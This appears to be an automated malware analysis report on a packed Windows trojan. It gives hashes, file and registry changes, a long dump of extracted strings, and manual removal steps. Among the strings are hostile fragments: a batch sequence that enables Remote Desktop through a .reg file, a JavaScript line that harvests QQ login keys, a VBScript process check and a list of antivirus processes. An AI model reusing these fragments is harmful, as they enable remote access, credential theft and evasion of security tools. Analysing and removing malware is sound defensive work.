MD5: 0776a249431b18438b51f6e903e19b07
SHA1: f220d944478f1a54a4bb571af5d0abef8449b931
SHA256: 03ba361be9ca42929be3ba1d239deb8681625e2e65ee64f4e499dd2ce327fb2d
SSDeep: 12288:gvf8A71r20kr5BFKk1BCWGmLUuIhdiijezHFLNiInJa4xiTNVTQc EIjH Kqb:YNk7FBGmuhBjmtNbJtKNVD bT K
Size: 729088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-07-31 18:45:27
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Process activity

The DeepScan creates the following process(es):

WScript.exe:1620

The DeepScan injects its code into the following process(es):

%original file name%.exe:452

Mutexes

The following mutexes were created/opened:

SHIMLIB_LOG_MUTEX

File activity

The process %original file name%.exe:452 makes changes in the file system.
The DeepScan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\VBS3.vbs (694 bytes)
C:\System32\svchcst.exe (3802 bytes)

Registry activity

The process %original file name%.exe:452 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE EE ED 4A CE 02 29 B0 1F 2A 32 D7 37 E3 4F 8C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

To automatically run itself each time Windows is booted, the DeepScan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Winder" = "C:\System32\svchcst.exe"

The DeepScan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The DeepScan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The DeepScan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process WScript.exe:1620 makes changes in the system registry.
The DeepScan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 3D 7E 74 1F 14 BB 5C A7 5A CD B3 42 96 25 45"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ???
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: Windows ????
Comments: ??????????(http://www.dywt.com.cn)
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The DeepScan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

@.vmp0

.vmp1

.reloc

t%SVh

t$(SSh

|$D.tm

~%UVW

t.It It

u.hp?N

u$SShe

shell32.dll

user32.dll

gdiplus.dll

ole32.dll

kernel32.dll

avicap32.dll

winmm.dll

ntdll.dll

advapi32.dll

ADVAPI32.DLL

Advapi32.dll

Winhttp.dll

rasapi32.dll

atl.dll

ShellExecuteA

keybd_event

GdiplusShutdown

GetKeyState

GetAsyncKeyState

CreatePipe

PeekNamedPipe

WinExec

RegOpenKeyExA

RegEnumKeyExA

RegCloseKey

RegCreateKeyA

RegDeleteKeyA

RegOpenKeyA

WinHttpCheckPlatform

WinHttpCrackUrl

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpSetCredentials

WinHttpCloseHandle

WinHttpSetOption

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpQueryHeaders

RegEnumKeyA

OpenWindowStationA

SetProcessWindowStation

Dwmapi.dll

wscript.exe

C:\System32\svchcst.exe

118.192.163.198

C:\System32\

svchcst.exe

C:\System32

set wmi=getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")

set procs=wmi.execquery("select * from win32_process")

if strcomp(proc.name,proname)=0 Or strcomp(proc.name,proname1)=0 then

Set WshShell = Wscript.CreateObject("Wscript.Shell")

WshShell.Run ("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") '60A

wscript.sleep 500

@Microsoft\VBS3.vbs

,@{557CF400-1A04-11D3-9A73-0000F81EF32E}

{557CF401-1A04-11D3-9A73-0000F81EF32E}

{557CF402-1A04-11D3-9A73-0000F81EF32E}

{557CF405-1A04-11D3-9A73-0000F81EF32E}

{557CF406-1A04-11D3-9A73-0000F81EF32E}

command.com /c

cmd.exe /c

Windows 10

Windows Server Technical Preview

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

Windows 8

Windows Server 2012

Windows 8.1

Windows Server 2012 R2

Windows 2000

Windows XP

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Windows 98

Web Server Edition

SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild

360tray.exe

360Tray.exe

QQPCTray.exe

360sd.exe

BaiduSdSvc.exe

kxetray.exe

KSafeTray.exe

RavMon.exe

KvMonXP.exe

mcupdui.exe

egui.exe

secenter.exe

avp.exe

ccSvrHst.exe

Navapsvc.exe

spiderui.exe

Dr.Web

avcenter.exe

avguard.exe

ashDisp.exe

FilMsg.exe

AVK.exe

PFW.exe

Iparmor.exe

2.txt

5B3838F5-0C81-46D9-A4C0-6EA28CA3E942

hXXp://VVV.

explorer hXXp://VVV.

author:[email protected]

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

del 3389.reg

$@\3389.bat

binPath= "cmd.exe /c start "

sc.exe Create "

sc.exe description "

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

HKEY_CLASSES_ROOT

HKEY_USERS

\Software\Microsoft\Windows\CurrentVersion\Run

cmd.exe /c del svchcst.exe

cmd.exe /c del

hXXp://map.baidu.com/?qt=operateData&getOpModules=op1,op2,op3,op4,op5,op6,op7

http=

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Content-Type: application/x-www-form-urlencoded

Adodb.Stream

WinHttp

0@SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

\Microsoft\Network\Connections\pbk\rasphone.pbk

QQkey2

QQkey1

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0

javascript:for(var C=0;C<q_aUinList.length;C  ){var D=q_aUinList[C];document.write(D.uin "," D.key "[

cmd /c systeminfo > "

VBScript.RegExp

@{1d5be4b5-fa4a-452d-9cdd-5db35105e7eb}

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

.PAVCException@@

Shell32.dll

Mpr.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

<Msg%s>%ld</Msg%s>

0000%d

</Msg0000>

<Msg0000>

EMSG

Recv Sub Packet(%s)..

Recv Packet (%s)...

%s\%s.lnk

Software\Microsoft\Windows\CurrentVersion\Run

x86 Family %s Model %s Stepping %s

X-X-X-X

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

code %d bits %d->%d

gen_codes: max_code %d

bl code -

opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u

last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)

;3 #>6.&

'2, / 0&7!4-)1#

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

c:\%original file name%.exe

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

#include "l.chs\afxres.rc" // Standard components

hf.iKf

=$=_=|=7>

 ZWINSPOOL.DRV

z.nm.N

.YS(^

#>ZWININET.dll

=fSHELL32.dll

ADVAPI32.dll

.DXxh

'COMCTL32.dll

The ordinal %u could not be located in the dynamic link library %s

@O(,-h%C

:%FqA

.The procedure entry point %s could not be located in the dynamic link library %s

HjwEB

,COLEAUT32.dll

InternetCanonicalizeUrlA

RYS.NiB

b^.su

TcP"k

TCpf

s%uO=/

comdlg32.dll

3R)[.zt

MfTP*

*.jO.

f%ufZ

.uat G

nGôa

5,.qVT

5iH%uUW

A.eHfM

{~.my

e%l:%c

d,D%c

\.tU^^

#]üJC

I5 %s

%.WvJ

5[%c<<

.ziKS

.Nh$r

-.Rtb

%F'<D

1af6%s

bxtOr%u

/b*%u-%;

(r.VD

KERNEL32.dll

USER32.dll

R/Y6w.meV

%Su#[

.YI YZ

8k%d/

(p.XF

.Sr_4

$uM%d

msGcI"

MfC%8Xt

GDI32.dll

RASAPI32.dll

>ole32.dll

WINMM.dll

WS2_32.dll

1.0.0.0

Windows

(hXXp://VVV.dywt.com.cn)

(*.*)

%original file name%.exe_452_rwx_0053F000_00030000:

hf.iKf

=$=_=|=7>

%original file name%.exe_452_rwx_00615000_00002000:

GDI32.dll

RASAPI32.dll

>ole32.dll

WINMM.dll

WS2_32.dll

WScript.exe_1620:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

msvcrt.dll

OLEAUT32.dll

ole32.dll

VERSION.dll

wscript.exe

advapi32.dll

kernel32.dll

%s%s.DLL

wintrust.dll

%d.%d

Invalid parameter passed to C runtime function.

SOFTWARE\Classes\%s\%s

0x%8X

CreateURLMonikerEx

urlmon.dll

@@8X%u

RegCreateKeyA

RegCloseKey

RegOpenKeyA

RegDeleteKeyA

RegCreateKeyExW

RegCreateKeyExA

RegOpenKeyExW

ReportEventW

RegEnumKeyExA

RegOpenKeyExA

GetProcessHeap

GetCPInfo

MsgWaitForMultipleObjects

EnumThreadWindows

wscript.pdb

stdole2.tlbWWW

.ObjectWW

KeyW

WindowsFolderWWW4

%CopyFolderWWL

Windows Script Host (Ver 5.6)W)

Windows Script Host Application InterfaceW%

Windows Script Host Object

ebstrCmdLineW

78t8x8

5Q5F5

Software\Microsoft\Windows Script Host\Settings

Windows Script Host

WScript.CreateObject

WSHRemote.Execute

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

Microsoft (R) Windows Based Script Host

5.7.0.16599

Microsoft (R) Windows Script Host

(Windows Script Host (debugging disabled)

Windows Script Host Error

Windows Script Host Input Error

This Unicode version of Windows Script Host will only execute under Windows NT.

Please use the ANSI version of Windows Script Host."

WScript execution time was exceeded on script "%1!ls!".

Script execution was terminated.1Could not locate automation class named "%1!ls!".

Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).

Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.<Attempt to execute Windows Script Host while it is disabled.SAttempt to execute Windows Script Host remotely while remote execution is disabled.

Missing job name.*Unicode is not supported on this platform.

<The Windows Script Host settings have been reset to default.

Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.

Win32 Error 0x%X

Windows Script Host(Windows Script Host (debugging disabled)

Usage: WScript scriptname.extension [option...] [arguments...]

Use engine for executing script

Changes the default script host to CScript.exe

Changes the default script host to WScript.exe (default)

Prevent logo display: No banner will be shown at execution time

#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.

%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   WScript.exe:1620

2. Delete the original DeepScan file.
   
3. Delete or disinfect the following files created/modified by the DeepScan:
   

   %Documents and Settings%\%current user%\Application Data\Microsoft\VBS3.vbs (694 bytes)
   C:\System32\svchcst.exe (3802 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Winder" = "C:\System32\svchcst.exe"

5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.